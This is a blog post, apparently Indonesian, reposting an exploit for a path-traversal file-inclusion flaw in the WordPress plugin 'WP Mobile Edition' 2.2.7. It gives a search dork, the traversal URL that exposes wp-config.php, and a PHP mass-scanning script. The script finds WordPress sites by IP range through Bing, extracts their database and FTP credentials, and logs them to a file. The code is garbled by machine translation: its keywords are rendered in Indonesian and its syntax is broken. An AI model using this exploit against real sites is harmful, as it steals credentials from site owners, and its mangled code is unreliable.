Plugin WordPress 'WP Mobile Edition' LFI Vulnerability
Oleh
chmood
# Exploit Judul: WordPress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Tanggal: 6 Juni 2015 #
# Exploit Penulis: Virus OS #
# Google Dork: iilnurl:? Fdx_switcher = Mobe #
# Penjual Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Versi: WP Mobile Edition Versi 2.2.7 #
# Diuji pada: jendela #
########################################
Keterangan:
Wordpress Plugin 'WP Mobile Edition' tidak menyaring data sehingga kita bisa mendapatkan file configration di jalan
<Site.com/wp-content/themes/mTheme-Unus/css/css.php?files = .. / .. / .. / .. / wp-config.php>
# Exploite Kode:
<? php
// Virus OS
set_time_limit (0);
error_reporting (0);
echo "############### Fdx_Switcher Minibot Dengan ip Rentang ################## \ n \ n";
print "Kode By _
__ _ (_) _ __ _ _ ___ ___ ___
\ \ / / | '__ | | | / __ | / _ \ / __ |
\ V / | | | | | _ | \ __ \ | (_) \ __ \
\ _ / | _ | _ | \ __, _ | ___ / \ ___ / | ___ /
Menyapa >> CoderLeeT | Fallag Gassrini | Taz | S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook: https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook: https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Selamat Guru Virus OS ################ \ n \ n";
echo "Server Sasaran IP:";
$ ip = trim (fgets (STDIN, 1024));
$ ip = meledak (, $ ip '.');
. '.'.. '.'. $ ip = $ ip [0] $ ip [1] $ ip [2]. '.';
untuk ($ i = 0; $ i <= 255; $ i ++)
{
$ situs = array_map ("situs", bing ("ip: $ ip $ i wordpress."));
$ un = array_unique ($ situs);
echo "[+] Scanning ->", $ ip $ i, "\ n";. "."
echo "Ditemukan:" Count ($ situs) "situs \ n \ n";.
foreach ($ un sebagai $ pok) {
$ host = findit ($ file, "DB_HOST ','", "');");
$ db = findit ($ file, "DB_NAME ','", "');");
$ kita = findit ($ file, "DB_USER ','", "');");
$ pw = findit ($ file, "DB_PASSWORD ','", "');");
$ bda = "http: // $ pok";
$ linkof = '/ wp-content / themes / mTheme-Unus / css / css.php file = .. / .. / .. / .. / wp-config.php?';
$ dn = ($ bda) ($ linkof).;
$ file = @ file_get_contents ($ dn);
if (eregi ('DB_HOST', $ file) dan! eregi ('FTP_USER', $ file)) {
.. echo "[+] Scanning =>" $ bda "\ n \ n";
echo "[+] DB NAME:" .findit ($ file, "DB_NAME ','", "');") "\ n \ n";.
echo "[+] DB USER:" .findit ($ file, "DB_USER ','", "');") "\ n \ n";.
echo "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
echo "[+] DB host:" .findit ($ file, "DB_HOST ','", "');") "\ n \ n";.
$ db = "[+] DB NAME:". .findit ($ file, "DB_NAME ','", "');") "\ n \ n";
$ user = "[+] DB PENGGUNA:". .findit ($ file, "DB_USER ','", "');") "\ n \ n";
$ pass = "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
$ host = "[+] DB host:". .findit ($ file, "DB_HOST ','", "');") "\ n \ n";
$ ux = "" $ bda.. "\ r \ n";
$ ux1 = "". $ db. "\ r \ n";
$ UX2 = "" $ user.. "\ r \ n";
$ ux3 = "". $ lulus. "\ r \ n";
$ ux4 = "" $ host.. "\ r \ n";
$ menyelamatkan = fopen ('exploited.txt', 'ab');
fwrite ($ simpan, "$ ux");
fwrite ($ simpan, "$ ux1");
fwrite ($ simpan, "$ UX2");
fwrite ($ simpan, "$ ux3");
fwrite ($ simpan, "$ ux4");
}
elseif (eregi ('DB_HOST', $ file) dan eregi ('FTP_USER', $ file)) {
echo "user FTP:" .findit ($ file, "FTP_USER ','", "');") "\ n \ n";.
echo "FTP lulus:" .findit ($ file, "FTP_PASS ','", "');") "\ n \ n";.
echo "FTP host:" .findit ($ file, "FTP_HOST ','", "');") "\ n \ n";.
}
else {echo $ bda ": Eksploitasi gagal \ n \ n";.}
}
}
Fungsi findit ($ mytext, $ StartTag, $ EndTag) {
$ posLeft = stripos ($ mytext, $ StartTag) + strlen ($ StartTag);
$ posRight = stripos ($ mytext, $ EndTag, $ posLeft + 1);
pulang substr ($ mytext, $ posLeft, $ posRight- $ posLeft);
}
situs function ($ link) {
kembali str_replace ("", "", parse_url ($ link PHP_URL_HOST));
}
Fungsi bing ($ apa) {
untuk ($ i = 1; $ i <= 2000; $ i + = 10) {
$ ch = curl_init ();
curl_setopt ($ ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ ch, CURLOPT_USERAGENT, "msnbot / 1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ ch, CURLOPT_COOKIEFILE, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_COOKIEJAR, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1);
$ data = curl_exec ($ ch);
preg_match_all ('#;? a = (*) "h =" #.', $ data, $ link);
foreach ($ link [1] sebagai $ link) {
$ allLinks [] = $ Link;
}
jika istirahat (preg_match ('# "sw_next" #', $ data)!);
}
if (! empty ($ allLinks) && is_array ($ allLinks)) {
kembali array_unique (array_map ("urldecode", $ allLinks));
}
}
Category
Komentar